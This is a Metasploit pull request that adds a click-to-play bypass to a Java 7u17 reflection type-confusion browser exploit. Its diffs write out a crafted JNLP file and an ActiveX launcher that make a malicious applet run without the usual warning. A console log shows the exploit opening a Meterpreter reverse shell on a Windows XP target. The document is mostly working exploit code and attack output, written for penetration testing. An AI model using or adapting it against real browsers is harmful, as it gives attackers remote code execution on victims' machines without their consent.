### PR TITLE
Java7u17 click2play bypass

### DIFF
--- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb
+++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb
@@ -93,17 +93,19 @@ class Metasploit3 < Msf::Exploit::Remote
 		@exploit_class_name = rand_text_alpha("Exploit".length)
 		@exploit_class.gsub!("Exploit", @exploit_class_name)
 
-		@jnlp_uri  = ((datastore['SSL']) ? "https://" : "http://")
-		@jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
-		@jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(8)}.jnlp"
+		@jnlp_name = rand_text_alpha(8)
 
 		super
 	end
 
 	def jnlp_file
-		%Q|
+		jnlp_uri  = ((datastore['SSL']) ? "https://" : "http://")
+		jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+		jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{@jnlp_name}.jnlp"
+
+		jnlp = %Q|
 <?xml version="1.0" encoding="utf-8"?>
-<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{@jnlp_uri}">
+<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
 	<information>
 		<title>Applet Test JNLP</title>
 		<vendor>#{rand_text_alpha(8)}</vendor>
@@ -121,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	<update check="background"/>
 </jnlp>
 		|
+		return jnlp
 	end
 
 	def on_request_uri(cli, request)
@@ -161,11 +164,15 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def generate_html
+		jnlp_uri  = ((datastore['SSL']) ? "https://" : "http://")
+		jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+		jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{@jnlp_name}.jnlp"
+
 		html = %Q|
 		<html>
 		<body>
 		<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
-		<param name="app" value="#{@jnlp_uri}">
+		<param name="app" value="#{jnlp_uri}">
 		<param name="back" value="true">
 		<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
 		</object>

--- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb
+++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb
@@ -99,9 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def jnlp_file
-		jnlp_uri  = ((datastore['SSL']) ? "https://" : "http://")
-		jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
-		jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{@jnlp_name}.jnlp"
+		jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
 
 		jnlp = %Q|
 <?xml version="1.0" encoding="utf-8"?>
@@ -164,9 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def generate_html
-		jnlp_uri  = ((datastore['SSL']) ? "https://" : "http://")
-		jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
-		jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{@jnlp_name}.jnlp"
+		jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
 
 		html = %Q|
 		<html>

--- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb
+++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb
@@ -25,8 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote
 					This module abuses Java Reflection to generate a Type Confusion, due to a weak
 				access control when setting final fields on static classes, and run code outside of
 				the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This
-				exploit doesn't bypass click-to-play, so the user must accept the java warning in
-				order to run the malicious applet.
+				exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is
+				applied mainly to IE, when Java Web Start can be launched automatically throw the
+				ActiveX control. Otherwise the applet is launched without click-to-play bypass.
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        =>
@@ -41,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'BID', '59162' ],
 					[ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
 					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html' ],
-					[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/b453d9be6b3f' ]
+					[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/b453d9be6b3f' ],
+					[ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ]
 				],
 			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
 			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
@@ -90,13 +92,43 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		@exploit_class_name = rand_text_alpha("Exploit".length)
 		@exploit_class.gsub!("Exploit", @exploit_class_name)
+
+		@jnlp_uri  = ((datastore['SSL']) ? "https://" : "http://")
+		@jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+		@jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(8)}.jnlp"
+
 		super
+	end
+
+	def jnlp_file
+		%Q|
+<?xml version="1.0" encoding="utf-8"?>
+<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{@jnlp_uri}">
+	<information>
+		<title>Applet Test JNLP</title>
+		<vendor>#{rand_text_alpha(8)}</vendor>
+		<description>#{rand_text_alpha(8)}</description>
+		<offline-allowed/>
+	</information>
+
+	<resources>
+		<j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
+		<jar href="#{rand_text_alpha(8)}.jar" main="true" />
+	</resources>
+	<applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
+		<param name="__applet_ssv_validated" value="true"></param>
+	</applet-desc>
+	<update check="background"/>
+</jnlp>
+		|
 	end
 
 	def on_request_uri(cli, request)
 		print_status("handling request for #{request.uri}")
 
 		case request.uri
+		when /\.jnlp$/i
+			send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })
 		when /\.jar$/i
 			jar = payload.encoded_jar
 			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
@@ -129,10 +161,17 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def generate_html
-		html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
-		html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
-		html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
-		html += %Q|</applet></body></html>|
+		html = %Q|
+		<html>
+		<body>
+		<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
+		<param name="app" value="#{@jnlp_uri}">
+		<param name="back" value="true">
+		<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
+		</object>
+		</body>
+		</html>
+		|
 		return html
 	end
 


### PR DESCRIPTION
Add the click2play bypass published at http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html . Used on IE where the ActvX can be used to launch Java Web Start automatically. On other browser dont't use it atm because Java Web Start should be configured to hanld jnlp files, which I guess isn't the usual.

```
msf exploit(java_jre17_reflection_types) > rexploit
[*] Stopping existing job...

[*] Server stopped.
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:8080/MdeJSHVHgNsW7Qy
[*] Server started.
msf exploit(java_jre17_reflection_types) > [*] 192.168.172.175  java_jre17_reflection_types - handling request for /MdeJSHVHgNsW7Qy
[*] 192.168.172.175  java_jre17_reflection_types - handling request for /MdeJSHVHgNsW7Qy/
[*] 192.168.172.175  java_jre17_reflection_types - handling request for /MdeJSHVHgNsW7Qy/lETUeKyZ.jnlp
[*] 192.168.172.175  java_jre17_reflection_types - handling request for /MdeJSHVHgNsW7Qy/AnkUEJvE.jar
[*] Sending stage (30246 bytes) to 192.168.172.175
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.175:1314) at 2013-04-25 10:27:52 -0500

msf exploit(java_jre17_reflection_types) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : juan-c0de875735
OS          : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.175 - Meterpreter session 1 closed.  Reason: User exit

```
